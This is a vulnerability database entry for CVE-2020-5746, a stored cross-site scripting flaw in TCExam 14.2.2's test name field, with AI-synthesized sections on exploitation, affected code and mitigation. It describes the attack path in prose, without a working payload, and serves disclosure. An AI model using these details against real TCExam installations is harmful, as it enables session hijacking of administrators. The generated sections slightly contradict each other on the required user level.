CVE-2020-5746
Description
Insufficient output sanitization in TCExam 14.2.2 allows a remote, authenticated attacker to conduct persistent cross-site scripting (XSS) attacks by creating a crafted test.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
TCExam 14.2.2 allows authenticated persistent XSS via crafted test creation, enabling admin-level compromise.
Vulnerability
TCExam 14.2.2 suffers from insufficient output sanitization in the test creation functionality. An authenticated attacker with any user level can create a crafted test containing malicious payloads that are stored and later executed in the context of other users, including administrators. The vulnerability is present in the application's handling of test input fields.
Exploitation
An attacker must be authenticated to the TCExam application (any user level). The attacker creates a new test and injects malicious JavaScript or HTML into input fields that are not sanitized. When other users (e.g., administrators) view or manage the crafted test, the payload executes in their browser session. No additional user interaction is required beyond normal browsing.
Impact
Successful exploitation leads to persistent cross-site scripting (XSS) [1]. The attacker can execute arbitrary JavaScript in the context of the victim's session, potentially leading to session hijacking, privilege escalation, or performing administrative actions on behalf of the victim. Combined with other vulnerabilities (CSRF, directory traversal), this can allow complete compromise of the application.
Mitigation
As of the publication date (2020-05-07), TCExam 14.2.2 is vulnerable. Upgrading to a patched version is the primary mitigation. No workaround is provided in the available references [1]. The vendor should release a fix that properly sanitizes user input in test creation and other areas. Until then, restrict authenticated user access and monitor for suspicious test creation.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- TCExam/TCExamdescription
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient output sanitization of the test name field allows stored cross-site scripting (XSS)."
Attack vector
An authenticated attacker (level 5 or higher) creates a test whose name field contains HTML script tags with malicious JavaScript [ref_id=1]. The crafted test can be assigned to all groups. When any user assigned to a group logs in and views their tests, the unsanitized test name is rendered in the browser, causing the injected script to execute [ref_id=1]. This includes the admin user, making the attack persistent and cross-site [ref_id=1].
Affected code
The vulnerability resides in `shared/code/tce_functions_test.php` in the function `F_testInfoLink($test_id, $link_name = "")`, which is called with the unsanitized test name via `index.php`'s `F_getUserTests()` call [ref_id=1]. The test name is stored unsanitized and later output without sanitization, allowing HTML/JavaScript injection [ref_id=1].
What the fix does
The advisory does not include a patch or specific remediation code [ref_id=1]. The recommended fix is to sanitize or encode the test name output in `F_testInfoLink()` and any other location where user-supplied test names are rendered, preventing HTML/JavaScript injection [ref_id=1]. Without such sanitization, the stored XSS remains exploitable.
Preconditions
- authAttacker must be authenticated with a user level of 5 or higher
- inputAttacker must have the ability to create or edit tests
- configThe crafted test must be assigned to groups that include target users
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.tenable.com/security/research/tra-2020-31mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.